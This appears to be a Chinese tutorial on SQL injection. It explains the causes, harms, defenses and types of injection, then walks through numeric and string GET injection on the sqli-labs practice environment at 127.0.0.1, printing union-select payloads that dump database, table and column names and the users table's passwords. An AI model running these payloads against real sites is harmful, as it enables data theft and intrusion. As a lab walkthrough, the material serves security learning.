SQL注入概述与GET注入实例

SQL注入概述

什么是SQL注入漏洞

攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

SQL注入原理

服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。

两个条件

  • 用户能够控制输入
  • 原本程序要执行的SQL语句,拼接了用户输入的恶意数据

SQL注入过程

SQL注入危害

  • 绕过登录验证:使用万能密码登录网站后台等
  • 获取敏感数据:获取网站管理员帐号、密码等
  • 文件系统操作:列目录,读取、写入文件等
  • 注册表操作:读取、写入、删除注册表等
  • 执行系统命令: 远程执行命令

防御方法 

严格过滤用户提交的参数

数据库信息加密

使用安全参数

使数据库服务器和web服务器分离

限制用户的权限

过滤危险函数

多层验证

 SQL注入分类

按照注入点类型分类

  • 数字型(整型)注入

输入的参数为整数,如ID、年龄、页码等,如果存在注入型漏洞,则为数字型(整型)注入

  • 字符型注入
  1. 输入的参数为字符串
  2. 与数字型注入的区别在于:字符型注入一般要使用单引号来闭合

按照注入技术(执行效果)分类

  • 基于布尔的盲注

即可以根据返回页面判断条件真假的注入。

  • 基于时间的盲注

即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

  • 基于报错的注入

即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

  • 联合查询注入

可以使用union的情况下的注入。

  • 堆查询注入

同时执行多条语句的注入。

SQL注入漏洞形成原因

动态字符串构建引起

  • 不正确的处理转义字符(宽字节注入)
  • 不正确的处理错误(报错泄露信息)
  • 不正确的处理联合查询
  • 不正确的处理多次提交(二次注入)

后台存在的问题

  • 后台无过滤或者编码用户数据
  • 数据库可以拼接用户传递的恶意代码

错误处理不当

  • 详细的内部错误消息显示给用户或攻击者
  • 错误信息可以直接给攻击者提供下一步攻击帮助 

 SQL注入过程

  1. 判断是否存在注入点;
  2. 判断字段长度(字段数)
  3. 判断字段回显位置;
  4. 判断数据库信息;
  5. 查找数据库名;
  6. 查找数据库表;
  7. 查找数据库表中所有字段以及字段值;
  8. 猜解账号密码;
  9. 登录管理员后台。

 SQL注入实例

数字型GET注入

判断注入点

http://127.0.0.1/sqli/Less-2/?id=1'

 页面报错 判断有注入点。

http://127.0.0.1/sqli/Less-2/?id=1' --+
http://127.0.0.1/sqli/Less-2/?id=1' #
http://127.0.0.1/sqli/Less-2/?id=1' --

尝试判断多种闭合字符时,均没有正常回显,因此先判断其为数字型

http://127.0.0.1/sqli/Less-2/?id=1 and 1=2

页面未正常回显,确认注入点为数字型

 判断字段数

http://127.0.0.1/sqli/Less-2/?id=1 order by 4

 报错,说明不是4列

http://127.0.0.1/sqli/Less-2/?id=1 order by 3

正常回显,判断列数为3

union select求显示位

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3

 回显位置为2和3

暴库

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,database(),3

 暴表

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

 暴字段

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'

 暴内容

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(id,password,username),3 from security.users

字符型GET注入

判断注入点

http://127.0.0.1/sqli/Less-1/?id=1'

 报错,判断有sql注入点,判断是否为字符型注入,判断注释符

http://127.0.0.1/sqli/Less-1/?id=1' --+

 输入--+后,页面正常回显,说明注释符判断正确

判断列数

http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+

求显示位 

http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+

后面的暴库暴表暴字段操作与前面一样,不再演示 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐


学习编程是顺着互联网的发展潮流,是一件好事。新手如何学习编程?其实不难,不过在学习编程之前你得先了解你的目的是什么?这个很重要,因为目的决定你的发展方向、决定你的发展速度。
IT行业是什么工作做什么?IT行业的工作有:产品策划类、页面设计类、前端与移动、开发与测试、营销推广类、数据运营类、运营维护类、游戏相关类等,根据不同的分类下面有细分了不同的岗位。
女生学Java好就业吗?女生适合学Java编程吗?目前有不少女生学习Java开发,但要结合自身的情况,先了解自己适不适合去学习Java,不要盲目的选择不适合自己的Java培训班进行学习。只要肯下功夫钻研,多看、多想、多练
Can’t connect to local MySQL server through socket \'/var/lib/mysql/mysql.sock问题 1.进入mysql路径
oracle基本命令 一、登录操作 1.管理员登录 # 管理员登录 sqlplus / as sysdba 2.普通用户登录
一、背景 因为项目中需要通北京网络,所以需要连vpn,但是服务器有时候会断掉,所以写个shell脚本每五分钟去判断是否连接,于是就有下面的shell脚本。
BETWEEN 操作符选取介于两个值之间的数据范围内的值。这些值可以是数值、文本或者日期。
假如你已经使用过苹果开发者中心上架app,你肯定知道在苹果开发者中心的web界面,无法直接提交ipa文件,而是需要使用第三方工具,将ipa文件上传到构建版本,开...
下面的 SQL 语句指定了两个别名,一个是 name 列的别名,一个是 country 列的别名。**提示:**如果列名称包含空格,要求使用双引号或方括号:
在使用H5混合开发的app打包后,需要将ipa文件上传到appstore进行发布,就需要去苹果开发者中心进行发布。​
+----+--------------+---------------------------+-------+---------+
数组的声明并不是声明一个个单独的变量,比如 number0、number1、...、number99,而是声明一个数组变量,比如 numbers,然后使用 nu...
第一步:到appuploader官网下载辅助工具和iCloud驱动,使用前面创建的AppID登录。
如需删除表中的列,请使用下面的语法(请注意,某些数据库系统不允许这种在数据库表中删除列的方式):
前不久在制作win11pe,制作了一版,1.26GB,太大了,不满意,想再裁剪下,发现这次dism mount正常,commit或discard巨慢,以前都很快...
赛门铁克各个版本概览:https://knowledge.broadcom.com/external/article?legacyId=tech163829
实测Python 3.6.6用pip 21.3.1,再高就报错了,Python 3.10.7用pip 22.3.1是可以的
Broadcom Corporation (博通公司,股票代号AVGO)是全球领先的有线和无线通信半导体公司。其产品实现向家庭、 办公室和移动环境以及在这些环境...
发现个问题,server2016上安装了c4d这些版本,低版本的正常显示窗格,但红色圈出的高版本c4d打开后不显示窗格,
TAT:https://cloud.tencent.com/document/product/1340